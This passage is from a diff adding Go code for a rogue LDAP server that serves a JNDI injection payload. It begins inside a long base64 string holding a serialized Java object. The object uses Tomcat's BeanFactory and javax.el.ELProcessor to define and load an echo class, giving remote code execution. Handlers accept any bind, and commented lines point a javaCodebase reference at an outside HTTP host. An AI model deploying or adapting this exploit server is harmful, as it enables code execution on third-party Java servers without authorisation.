UUFZV1FNdFU3WUFHU29FdlFBYVdRTXNVN1lBRzFleEFBRUFBQUJvQUdzQVF3QURBRkVBQUFBcUFBb0FBQUJPQUFZQVR3QUxBRkFBU2dCUkFHZ0FWZ0JyQUZJQWJRQlRBSE1BVkFDUEFGVUFyUUJZQUZJQUFBQklBQWNBQ3dCZ0FGa0FXQUFDQUFZQVpRQmZBSFVBQXdCdEFFQUFaZ0IyQUFRQUFBQ3VBSGNBV0FBQUFBQUFyZ0JlQUhnQUFRQ1BBQjhBV1FCWUFBSUFjd0E3QUY4QWRRQURBR3NBQUFBUkFBTDNBR3NIQUhuOUFFRUhBRzhIQUhvQWV3QUFBQVFBQVFBUUFBb0FmQUI5QUFJQVVBQUFBTlVBQXdBRkFBQUFPQUZOS3JZQUZrNHRFaHFsQUJZdEs3WUFSazJuQUEwNkJDMjJBRWhPcC8vcUxNY0FETHNBUjFrcnR3Qkp2eXdFdGdCS0xDcTJBRXV3QUFFQURRQVRBQllBUndBREFGRUFBQUF5QUF3QUFBQmJBQUlBWEFBSEFGNEFEUUJnQUJNQVlRQVdBR0lBR0FCakFCMEFaQUFnQUdjQUpBQm9BQzBBYWdBeUFHc0FVZ0FBQURRQUJRQVlBQVVBWmdCK0FBUUFBQUE0QUhjQVdBQUFBQUFBT0FCZUFHQUFBUUFDQURZQVdRQi9BQUlBQndBeEFGOEFkUUFEQUdzQUFBQVJBQVQ5QUFjSEFJQUhBSHBPQndDQkNRd0Fld0FBQUFRQUFRQVFBQUVBZ2dDREFBSUFVQUFBQUQ4QUFBQURBQUFBQWJFQUFBQUNBRkVBQUFBR0FBRUFBQUJ5QUZJQUFBQWdBQU1BQUFBQkFHa0FhZ0FBQUFBQUFRQ0VBSVVBQVFBQUFBRUFoZ0NIQUFJQWV3QUFBQVFBQVFDSUFBRUFnZ0NKQUFJQVVBQUFBRWtBQUFBRUFBQUFBYkVBQUFBQ0FGRUFBQUFHQUFFQUFBQjNBRklBQUFBcUFBUUFBQUFCQUdrQWFnQUFBQUFBQVFDRUFJVUFBUUFBQUFFQWlnQ0xBQUlBQUFBQkFJd0FqUUFEQUhzQUFBQUVBQUVBaUFBQkFJNEFBQUFDQUk4PScpOwp2YXIgY2xhc3NMb2FkZXIgPSBqYXZhLmxhbmcuVGhyZWFkLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKTsKdHJ5ewogICB2YXIgY2xhenogPSBjbGFzc0xvYWRlci5sb2FkQ2xhc3MoJ2NvbS5mZWlob25nLmxkYXAudGVtcGxhdGUuVG9tY2F0RWNob1RlbXBsYXRlJyk7CiAgIGNsYXp6Lm5ld0luc3RhbmNlKCk7Cn1jYXRjaChlcnIpewogICB2YXIgbWV0aG9kID0gamF2YS5sYW5nLkNsYXNzTG9hZGVyLmNsYXNzLmdldERlY2xhcmVkTWV0aG9kKCdkZWZpbmVDbGFzcycsICcnLmdldEJ5dGVzKCkuZ2V0Q2xhc3MoKSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgIG1ldGhvZC5zZXRBY2Nlc3NpYmxlKHRydWUpOwogICB2YXIgY2xhenogPSBtZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgY2xhenoubmV3SW5zdGFuY2UoKTsKfTsiKX1wcHBwcHh0ACVvcmcuYXBhY2hlLm5hbWluZy5mYWN0b3J5LkJlYW5GYWN0b3J5cHQAFGphdmF4LmVsLkVMUHJvY2Vzc29y") + e.AddAttribute("javaClassName", "foo") + e.AddAttribute("javaSerializedData", message.AttributeValue(payload)) + w.Write(e) + + res := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess) + w.Write(res) + // q.Done() + } else { + fmt.Println("[-] Ldap request err,exited.") + // q.Done() + } + +} + +// handleBind return Success for any login/pass +func handleBind(w ldap.ResponseWriter, m *ldap.Message) { + res := ldap.NewBindResponse(ldap.LDAPResultSuccess) + w.Write(res) + return +} + +// e.AddAttribute("objectClass", "javaNamingReference") +// e.AddAttribute("javaCodebase", "http://192.168.159.1:8080/") +// e.AddAttribute("JavaFactory", "TomcatEchoTemplate") +// e.AddAttribute("javaClassName", "TomcatEchoTemplate") +// w.Write(e) +// res := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess) +// w.Write(res)